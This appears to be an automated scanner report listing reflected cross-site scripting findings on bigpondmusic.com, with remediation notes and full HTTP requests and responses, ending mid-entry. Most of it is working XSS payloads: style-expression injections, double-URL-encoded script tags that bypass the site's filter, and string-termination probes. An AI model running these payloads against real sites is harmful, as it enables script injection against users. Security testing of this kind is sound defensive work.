<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>BigPond Music - Music Downlo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?7c8ab"style="x:expression(alert(1))"27f2f63ab70=1" /> ...[SNIP]...
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 704f3"style%3d"x%3aexpression(alert(1))"b95956680e9 was submitted in the ref parameter. This input was echoed as 704f3"style="x:expression(alert(1))"b95956680e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?ref=Net-Head-Music704f3"style%3d"x%3aexpression(alert(1))"b95956680e9 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:11:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 155783
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>BigPond Music - Music Downlo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?ref=Net-Head-Music704f3"style="x:expression(alert(1))"b95956680e9" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a30'%3bd1138b1a62b was submitted in the REST URL parameter 1. This input was echoed as f1a30';d1138b1a62b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /100f1a30'%3bd1138b1a62b/70 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87872
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32cac2f6a96 was submitted in the REST URL parameter 1. This input was echoed as d2e6b"><script>alert(1)</script>32cac2f6a96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /100d2e6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32cac2f6a96/70 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88199
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65295%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e803665935d5 was submitted in the REST URL parameter 2. This input was echoed as 65295"><script>alert(1)</script>803665935d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /100/7065295%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e803665935d5 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88311
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ccad'%3b8b45135ef4a was submitted in the REST URL parameter 2. This input was echoed as 4ccad';8b45135ef4a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /100/704ccad'%3b8b45135ef4a HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88005
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.11. http://bigpondmusic.com/100/70 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/100/70
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b21f"style%3d"x%3aexpression(alert(1))"d5b1a6bf075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b21f"style="x:expression(alert(1))"d5b1a6bf075 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /100/70?2b21f"style%3d"x%3aexpression(alert(1))"d5b1a6bf075=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:29:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 163568
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Get the best 100 albums from ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/70?2b21f"style="x:expression(alert(1))"d5b1a6bf075=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b20ec'%3bc7b5b48db1a was submitted in the REST URL parameter 1. This input was echoed as b20ec';c7b5b48db1a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /100b20ec'%3bc7b5b48db1a/80 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:30:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87780
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac9f7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee18865dec0f was submitted in the REST URL parameter 1. This input was echoed as ac9f7"><script>alert(1)</script>e18865dec0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /100ac9f7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee18865dec0f/80 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88311
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8469a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec4c8c7be166 was submitted in the REST URL parameter 2. This input was echoed as 8469a"><script>alert(1)</script>c4c8c7be166 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /100/808469a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec4c8c7be166 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:30:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87881
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b562'%3bc2936948212 was submitted in the REST URL parameter 2. This input was echoed as 5b562';c2936948212 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /100/805b562'%3bc2936948212 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:30:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87691
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.16. http://bigpondmusic.com/100/80 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/100/80
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95fa6"style%3d"x%3aexpression(alert(1))"a3ab55095f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95fa6"style="x:expression(alert(1))"a3ab55095f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /100/80?95fa6"style%3d"x%3aexpression(alert(1))"a3ab55095f4=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:29:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 164679
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Get the best 100 albums from ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/80?95fa6"style="x:expression(alert(1))"a3ab55095f4=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e1c8'%3b5e1da53fc24 was submitted in the REST URL parameter 1. This input was echoed as 6e1c8';5e1da53fc24 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CombineScriptHandler.aspx6e1c8'%3b5e1da53fc24 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:25:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87688
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 665d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed41d805a51f was submitted in the REST URL parameter 1. This input was echoed as 665d1"><script>alert(1)</script>d41d805a51f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /CombineScriptHandler.aspx665d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed41d805a51f HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:25:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87947
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ca3d'%3b95eca681716 was submitted in the REST URL parameter 1. This input was echoed as 4ca3d';95eca681716 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Vouchers4ca3d'%3b95eca681716/GiftBoxSelector HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87745
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47902%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e067d355d8b4 was submitted in the REST URL parameter 1. This input was echoed as 47902"><script>alert(1)</script>067d355d8b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vouchers47902%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e067d355d8b4/GiftBoxSelector HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
